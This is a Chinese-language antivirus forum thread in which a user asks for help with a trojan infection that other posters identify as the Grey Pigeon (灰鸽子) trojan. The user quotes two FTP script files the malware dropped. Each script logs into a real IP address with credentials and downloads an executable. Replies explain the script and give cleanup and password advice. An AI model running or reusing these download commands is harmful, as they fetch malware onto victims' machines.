瑞星卡卡安全论坛

以前的苦恼就不说了
N次折腾后,重做了新系统
昨天晚上打好补丁,OK
但刚刚突然,防火墙提示 自动认证了ftp.exe　（大概是这个意思）
系统　ＣＰＵ　１００％
查了会后发现C:\WINDOWS\system32　多了点东西
打开　多出的　nov.sys 　居然是

open 125.65.111.79
new
123
get 804860942.exe cyu.exe
bye
　
找到了 cyu.exe 但没找到804860942.exe
传上了，有高手帮我诊断诊断

-----ps 事发后我把　ftp.exe cmd.exe禁止掉了，不知道有用没

[用户系统信息]Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)


附件: 98393420071129183151.rar

有高手吗？

今天又有了新东西
同样在　C:\WINDOWS\system32　下
多出了　cc1.txt
　内容如下

open 59.52.29.229
admin
syw
binary
get g.exe
bye

在Ｃ盘根目录下多了个　8.exe
打包传上


附件: 9839342007113085243.rar

用瑞星08版试试，下载后升级到最新版本，在正常上模式下查杀，不行就在安全模式下查杀，或同时还可以用windows清理及windows优化大师，都试试看

已经是最新的０８版杀毒+防火墙
安全模式正常模式全试了

使用windows清理　发现是
G-server
灰鸽子木马及其变种

但其没杀掉
正在考虑如何彻底清理中．．．

感谢　农村阿哥

换杀软吧瑞星不行连灰鸽子都搞不定。。。不过其主动防御还是有点效果

扫SRENG日志。

瑞星真的那么差呀上，要 是这样的话我看我还是用别的杀毒软件算了，听说卡巴很强呀上，不知性能怎样。

LSD..卡巴也不杂的..

都用过了嘛..

有些病毒还是要靠手动的...

楼主，偶也不幸中招，搞了一天，到这会才恍然大悟！

open 125.65.111.79----  这是个ftp站点 ftp://125.65.111.79
new              ----  进入ftp站点的：用户名
123              ----  进入ftp站点的：密码
get 804860942.exe cyu.exe
              ---- 指示下载 ftp站点里面的 804860942.exe 重新命名为 cyu.exe 文件到你机子里面！
bye          ----完成任务 结束语


其实里面的804860942.exe就是个木马病毒！----

楼主机子里面应该还有一个 **.bat 批处理文件！（**指的是任意文件名），还有一个就是cyu.exe  木马文件！这三个文件，经测试金山和瑞星，还有木马清道夫，360均不能查出
解决方法：只要删除这三个应该就可……（找时间在同一天的文件）

如果这段时间我的QQ老是提醒激活！ 就是它在搞鬼的！

中招的人特别要注意，自己的一些游戏和QQ 聊天帐户等赶紧改密码和申请密码保护！  还有银行帐号！

唉，现在的病毒太多了！ 

靠，有这样变态的病毒啊，自动到别人的服务器上去下载文件。你安全模式下不能杀吗？